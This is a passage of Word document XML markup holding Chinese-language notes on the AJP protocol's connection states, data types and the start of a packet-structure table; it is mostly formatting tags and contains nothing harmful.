      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有两种状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1). Idle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有请求正使用该连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2). Assigned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前连接正在处理某个请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>数据类型:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>AJP协议中包括四种数据类型：Byte,</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="OLE_LINK1"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="OLE_LINK3"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="OLE_LINK5"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Byte:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Boolean：</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一个字节，1 = true, 0 = false。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Integer：两个字节，无符号整数，高位字节在前。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>String:可变字符串，最大长度为2^16.</w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>字符串的前而会有二个字节（Integer型）表示字符串的长度，-1表示null。字符串后面会跟上</w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="OLE_LINK6"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>终结符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”\0”，而且字符串长度不包括这个终结符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>AJP的包结构,图表1：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>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2475"/>
        <w:gridCol w:w="1035"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="855"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="1890"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidTr="008232D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>包方向</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1035" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
